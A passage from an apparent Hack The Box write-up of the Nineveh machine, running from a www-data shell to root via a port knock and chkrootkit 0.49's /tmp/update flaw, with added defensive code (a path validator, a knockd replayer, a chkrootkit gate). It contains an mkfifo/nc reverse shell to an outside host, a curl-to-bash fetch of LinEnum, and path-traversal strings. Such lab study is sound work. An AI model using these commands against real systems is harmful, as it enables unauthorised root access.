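def safe_notes_path(notes):
    """Map the `notes` parameter to a file under NOTES_ROOT, or None to reject it."""
    if "\x00" in notes:                       # NUL bytes truncate paths in C-backed APIs
        return None
    rel = notes.lstrip("/")
    if rel.startswith("files/"):              # the prefix the application expects
        rel = rel[len("files/"):]
    # Normalise "." and ".." lexically. A real deployment should additionally
    # realpath() the result so that symlinks cannot point outside NOTES_ROOT.
    resolved = posixpath.normpath(posixpath.join(NOTES_ROOT, rel))
    if posixpath.dirname(resolved) != NOTES_ROOT:
        return None                           # escaped the directory (or went into a subdir)
    if posixpath.basename(resolved) not in ALLOWED_NOTES:
        return None                           # not an allow-listed notes file
    return resolved


TRAVERSAL = "/files/ninevehNotes.txt/../../var/tmp/reverse.php"   # the parameter above
LEGIT = "/files/ninevehNotes.txt"

if __name__ == "__main__":
    for param in (LEGIT, TRAVERSAL, "/files/../../../../etc/passwd"):
        print(f"{param!r}: naive={naive_check(param)} safe={safe_notes_path(param)}")
```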

u505@kali:~/HTB/Machines/Nineveh$ rlwrap nc -lvnp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.43.
Ncat: Connection from 10.10.10.43:59278.
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
/bin/sh: 1: python: not found
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@nineveh:/var/www/html/department$ stty raw -echo
stty raw -echo

User flag

The ssh port is not reachable externally but is listening on localhost. So we can probably ssh in as the user amrois with the private key we found earlier.

www-data@nineveh:/var/www/html/department$ netstat -napl | grep LISTEN | grep 22
(Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -

So we download the private key.

u505@kali:~/HTB/Machines/Nineveh/www$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
[key material omitted]
-----END RSA PRIVATE KEY-----
u505@kali:~/HTB/Machines/Nineveh/www$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.43 - - [07/May/2020 23:11:07] "GET /id_rsa HTTP/1.1" 200 -

From the target.

www-data@nineveh:/var/www/html/department$ cd /tmp
www-data@nineveh:/tmp$ wget -q http://10.10.14.21/id_rsa
www-data@nineveh:/tmp$ chmod 600 id_rsa
www-data@nineveh:/tmp$ ssh -i id_rsa amrois@127.0.0.1
Could not create directory '/var/www/.ssh'.
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:aWXPsULnr55BcRUl/zX0n4gfJy5fg29KkuvnADFyMvk.
Are you sure you want to continue connecting (yes/no)? yes

Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
Ubuntu 16.04.2 LTS
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

133 packages can be updated.
66 updates are security updates.

You have mail.
Last login: Mon Jul 3 00:19:59 2017 from 192.168.0.14
amrois@nineveh:~$ cat user.txt
<USER_FLAG>

Privilege escalation

We execute the enumeration script.

amrois@nineveh:/tmp$ curl http://10.10.14.32/LinEnum.sh | bash
...
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h  dom mon dow   command
*/10 * * * * /usr/sbin/report-reset.sh
...
[-] Any interesting mail in /var/mail:
total 12
drwxrwsr-x  2 root   mail 4096 Jul  2  2017 .
drwxr-xr-x 14 root   root 4096 Jul  2  2017 ..
-rw-r--r--  1 amrois mail  483 Jul  2  2017 amrois
...

There is a crontab entry, but the script it runs is owned by amrois, and there is also a non-empty mail file for the amrois account.

report-reset.sh

amrois@nineveh:~$ ls -l /usr/sbin/report-reset.sh
-rwxr-x--- 1 amrois amrois 34 Jul  2  2017 /usr/sbin/report-reset.sh
amrois@nineveh:~$ cat /usr/sbin/report-reset.sh
#!/bin/bash

rm -rf /report/*.txt
amrois@nineveh:~$ ls -l /report/
total 56
-rw-r--r-- 1 amrois amrois 4802 May 11 15:20 report-20-05-11:15:20.txt
-rw-r--r-- 1 amrois amrois 4802 May 11 15:21 report-20-05-11:15:21.txt
-rw-r--r-- 1 amrois amrois 4802 May 11 15:22 report-20-05-11:15:22.txt
-rw-r--r-- 1 amrois amrois 4802 May 11 15:23 report-20-05-11:15:23.txt
-rw-r--r-- 1 amrois amrois 4802 May 11 15:24 report-20-05-11:15:24.txt
-rw-r--r-- 1 amrois amrois 4802 May 11 15:25 report-20-05-11:15:25.txt
-rw-r--r-- 1 amrois amrois 4802 May 11 15:26 report-20-05-11:15:26.txt
amrois@nineveh:~$ head /report/report-20-05-11:15:26.txt
ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `crontab'... not infected
Checking `date'... not infected
Checking `du'... not infected

The cron job deletes the files in the report folder. The files seem to be some kind of check report; what produces them is still unknown.

/var/mail/amrois

amrois@nineveh:/var/mail$ cat amrois
From root@nineveh.htb  Fri Jun 23 14:04:19 2017
Return-Path: <root@nineveh.htb>
X-Original-To: amrois
Delivered-To: amrois@nineveh.htb
Received: by nineveh.htb (Postfix, from userid 1000)
        id D289B2E3587; Fri, 23 Jun 2017 14:04:19 -0500 (CDT)
To: amrois@nineveh.htb
From: root@nineveh.htb
Subject: Another Important note!
Message-Id: <20170623190419.D289B2E3587@nineveh.htb>
Date: Fri, 23 Jun 2017 14:04:19 -0500 (CDT)

Amrois! please knock the door next time! 571 290 911

After some search, we find a strange process.

amrois@nineveh:~$ ps -ef | grep kno
root      1295     1  1 14:55 ?        00:00:22 /usr/sbin/knockd -d -i ens33
amrois    4077 24483  0 15:30 pts/1    00:00:00 grep --color=auto kno
amrois@nineveh:~$ ls -l /etc/kn*
-rw-r--r-- 1 root root 354 Aug  5  2017 /etc/knockd.conf
amrois@nineveh:~$ cat /etc/knockd.conf
[options]
 logfile = /var/log/knockd.log
 interface = ens33

[openSSH]
 sequence = 571, 290, 911
 seq_timeout = 5
 start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn

[closeSSH]
 sequence = 911,290,571
 seq_timeout = 5
 start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn

The knock daemon opens the ssh port for the source address that sends TCP SYNs to ports 571, 290 and 911, in that order, within 5 seconds.
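To see exactly what the knockd.conf above commits the host to, here is the door state machine it describes, replayed over a list of SYN events, as an added example (this is not knockd's code and not from the write-up). It assumes knockd's documented semantics: a source must hit the door's ports in order within seq_timeout, a port from the sequence arriving out of order resets that source's attempt, and ports outside the sequence are never seen because the capture filter excludes them. The event list is constructed; a defender can feed the same shape of tuples from a packet capture to reconstruct who opened or closed the port and when.

```python
"""Replay SYN events through the [openSSH] / [closeSSH] doors of knockd.conf."""

DOORS = {
    "openSSH": (571, 290, 911),    # sequence values from /etc/knockd.conf above
    "closeSSH": (911, 290, 571),
}
SEQ_TIMEOUT = 5.0                  # seq_timeout = 5


def match_knocks(events, doors=DOORS, timeout=SEQ_TIMEOUT):
    """Replay (timestamp, src_ip, dport) SYN events and return every
    (timestamp, src_ip, door) at which a source completed a door's sequence."""
    hits = []
    for door, seq in doors.items():
        ports = set(seq)
        state = {}                 # src_ip -> (index of next expected port, start time)
        for ts, ip, port in sorted(events):
            if port not in ports:
                continue           # knockd's capture filter only sees the door's ports
            idx, start = state.get(ip, (0, None))
            if start is not None and ts - start > timeout:
                idx, start = 0, None       # too slow: the attempt expired
            if port == seq[idx]:
                if idx == 0:
                    start = ts             # first correct knock starts the clock
                idx += 1
                if idx == len(seq):
                    hits.append((ts, ip, door))
                    idx, start = 0, None
            else:
                idx, start = 0, None       # out-of-order knock resets the attempt
            state[ip] = (idx, start)
    return sorted(hits)


def sample_events():
    """Constructed SYN events as (seconds, source address, destination port)."""
    return [
        (0.0, "10.10.14.21", 571), (1.0, "10.10.14.21", 290), (2.0, "10.10.14.21", 911),    # correct order
        (10.0, "10.10.14.9", 571), (17.0, "10.10.14.9", 290), (17.5, "10.10.14.9", 911),    # too slow
        (30.0, "10.10.14.21", 911), (30.5, "10.10.14.21", 290), (31.0, "10.10.14.21", 571), # close door
        (40.0, "10.10.14.7", 290), (40.1, "10.10.14.7", 571), (40.2, "10.10.14.7", 911),    # wrong order
    ]


if __name__ == "__main__":
    for ts, ip, door in match_knocks(sample_events()):
        print(f"t={ts:5.1f}s  {ip} completed {door}")
```

Note the asymmetry the config creates: the close sequence is the open sequence reversed, so a plain port scan that walks the three ports in ascending order (290, 571, 911) matches neither door.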

u505@kali:~/HTB/Machines/Nineveh/www$ for x in 571 290 911; do nmap -Pn --max-retries 0 -p $x 10.10.10.43; done
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 23:31 EDT
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for nineveh.htb (10.10.10.43)
Host is up.

PORT    STATE    SERVICE
571/tcp filtered umeter

Nmap done: 1 IP address (1 host up) scanned in 1.03 seconds
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 23:31 EDT
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for nineveh.htb (10.10.10.43)
Host is up.

PORT    STATE    SERVICE
290/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 23:31 EDT
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for nineveh.htb (10.10.10.43)
Host is up.

PORT    STATE    SERVICE
911/tcp filtered xact-backup

Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds

And the ssh port is now open and reachable for amrois.

u505@kali:~/HTB/Machines/Nineveh/www$ ssh -i id_rsa amrois@10.10.10.43
Ubuntu 16.04.2 LTS
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

133 packages can be updated.
66 updates are security updates.

You have mail.
Last login: Thu May 7 22:25:34 2020 from 127.0.0.1

SSH access is not required to solve the machine, but it makes the rest easier.

pspy

We copy pspy to the box over ssh with scp.

u505@kali:~/HTB/Machines/Nineveh/www$ scp -i id_rsa /opt/utils/pspy/pspy64 amrois@nineveh.htb:/tmp/
Ubuntu 16.04.2 LTS
pspy64                                        100% 3006KB   3.4MB/s   00:00

After about a minute, we observe a job run by root.

2020/05/11 15:47:01 CMD: UID=0    PID=19515  | /usr/sbin/CRON -f
2020/05/11 15:47:01 CMD: UID=0    PID=19517  | /bin/sh -c /root/vulnScan.sh
2020/05/11 15:47:01 CMD: UID=0    PID=19516  | /bin/sh -c /root/vulnScan.sh
2020/05/11 15:47:01 CMD: UID=0    PID=19518  | /bin/bash /root/vulnScan.sh
2020/05/11 15:47:01 CMD: UID=0    PID=19520  | /bin/sh /usr/bin/chkrootkit
...

Every minute, cron runs the script /root/vulnScan.sh as root, and that script calls chkrootkit. It seems this script is what generates the report files.

u505@kali:~/HTB/Machines/Nineveh$ searchsploit chkrootkit
----------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                   |  Path
                                                                 | (/usr/share/exploitdb/)
----------------------------------------------------------------- ----------------------------------------
Chkrootkit - Local Privilege Escalation (Metasploit)             | exploits/linux/local/38775.rb
Chkrootkit 0.49 - Local Privilege Escalation                     | exploits/linux/local/33899.txt
----------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

u505@kali:~/HTB/Machines/Nineveh$ searchsploit -m 33899
  Exploit: Chkrootkit 0.49 - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/33899
     Path: /usr/share/exploitdb/exploits/linux/local/33899.txt
File Type: ASCII text, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Nineveh/33899.txt

We cannot verify the version of chkrootkit yet, but exploit 33899 explains that the file ${ROOTDIR}tmp/update is executed as root. The first line of each report file tells us the ROOTDIR:

amrois@nineveh:~$ ls -l /report/
total 32
-rw-r--r-- 1 amrois amrois 4802 May 11 15:50 report-20-05-11:15:50.txt
-rw-r--r-- 1 amrois amrois 4802 May 11 15:51 report-20-05-11:15:51.txt
-rw-r--r-- 1 amrois amrois 4802 May 11 15:52 report-20-05-11:15:52.txt
-rw-r--r-- 1 amrois amrois 4802 May 11 15:53 report-20-05-11:15:53.txt
amrois@nineveh:~$ head -n 5 /report/report-20-05-11:15:50.txt
ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected

So, with ROOTDIR set to /, if we create the file /tmp/update it should be executed as root every minute.
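The fix for this weakness landed in chkrootkit 0.50; on a box that is stuck with an older release, a root cron wrapper can at least refuse to run while ${ROOTDIR}tmp/update exists. The script below is an added example (not part of the writeup or of chkrootkit itself): it parses the output of chkrootkit -V to decide whether the installed release is affected, inspects tmp/update under a given ROOTDIR, and demonstrates the gate against a ROOTDIR it builds in a temporary directory. The "planted" file and the version strings are constructed for the demo; nothing touches the real /tmp.

```python
"""Pre-flight check for chkrootkit's tmp/update weakness.

Added example, not part of the writeup or of chkrootkit: chkrootkit releases
before 0.50 run ${ROOTDIR}tmp/update as root when that file exists and has an
execute bit. A root cron wrapper can refuse to run an affected version while
such a file is present. The demo builds its own ROOTDIR in a temporary
directory; it never touches the real /tmp.
"""
import os
import re
import stat
import tempfile

VERSION_RE = re.compile(r"chkrootkit version (\d+)\.(\d+)")


def version_executes_tmp_update(version_output):
    """True for the output of 'chkrootkit -V' on a release older than 0.50."""
    m = VERSION_RE.search(version_output)
    if not m:
        raise ValueError("unrecognised version string: %r" % version_output)
    return (int(m.group(1)), int(m.group(2))) < (0, 50)


def check_tmp_update(rootdir):
    """Describe ${ROOTDIR}tmp/update as an affected chkrootkit would see it."""
    path = os.path.join(rootdir, "tmp", "update")
    info = {"present": False, "path": path}
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return info
    info.update(
        present=True,
        owner_uid=st.st_uid,
        # root may execute a file if any execute bit is set, so check all three
        executable=bool(st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)),
        world_writable=bool(st.st_mode & stat.S_IWOTH),
    )
    return info


def safe_to_run(rootdir, version_output):
    """Gate for a cron wrapper: block affected versions while tmp/update exists.

    Presence alone blocks the run: a non-executable file can be made executable
    by its owner before the next minute's cron tick.
    """
    if not version_executes_tmp_update(version_output):
        return True
    return not check_tmp_update(rootdir)["present"]


def demo():
    """Constructed scenario: empty ROOTDIR, then a planted tmp/update."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "tmp"))
        before = safe_to_run(root, "chkrootkit version 0.49")
        update = os.path.join(root, "tmp", "update")
        with open(update, "w") as fh:
            fh.write("#!/bin/sh\necho planted\n")
        os.chmod(update, 0o775)
        after = safe_to_run(root, "chkrootkit version 0.49")
        fixed = safe_to_run(root, "chkrootkit version 0.50")
        return {"before": before, "after": after, "fixed": fixed,
                "details": check_tmp_update(root)}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

In a wrapper such as the vulnScan.sh seen above, the gate would run before chkrootkit is invoked and log the owner_uid of whatever it found, which is exactly the kind of event an unprivileged user dropping a file into /tmp should trigger. Upgrading chkrootkit is still the real fix; the gate only buys time.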

Root Flag

We start the listener

u505@kali:~/HTB/Machines/Nineveh$ rlwrap nc -nlvp 4445
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445

/tmp/update file creation

amrois@nineveh:/tmp$ echo "rm /tmp/g;mkfifo /tmp/g;cat /tmp/g|/bin/sh -i 2>&1|nc 10.10.14.21 4445 >/tmp/g" > update
amrois@nineveh:/tmp$ cat update
rm /tmp/g;mkfifo /tmp/g;cat /tmp/g|/bin/sh -i 2>&1|nc 10.10.14.21 4445 >/tmp/g
amrois@nineveh:/tmp$ ls -l update
-rw-rw-r-- 1 amrois amrois 79 May  7 22:53 update
amrois@nineveh:/tmp$ chmod +x update

Within a minute, we get a root shell.

u505@kali:~/HTB/Machines/Nineveh$ rlwrap nc -lnvp 4445
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445
Ncat: Connection from 10.10.10.43.
Ncat: Connection from 10.10.10.43:42754.
/bin/sh: 0: can't access tty; job control turned off
# python3 -c "import pty;pty.spawn('/bin/bash')"
root@nineveh:~# stty raw -echo
stty raw -echo
root@nineveh:~# cat root.txt
<ROOT_FLAG>

Now we can confirm the chkrootkit version.

root@nineveh:~# /usr/bin/chkrootkit -V
chkrootkit version 0.49

References

Daniel Simao 14:38, 10 May 2020 (EDT)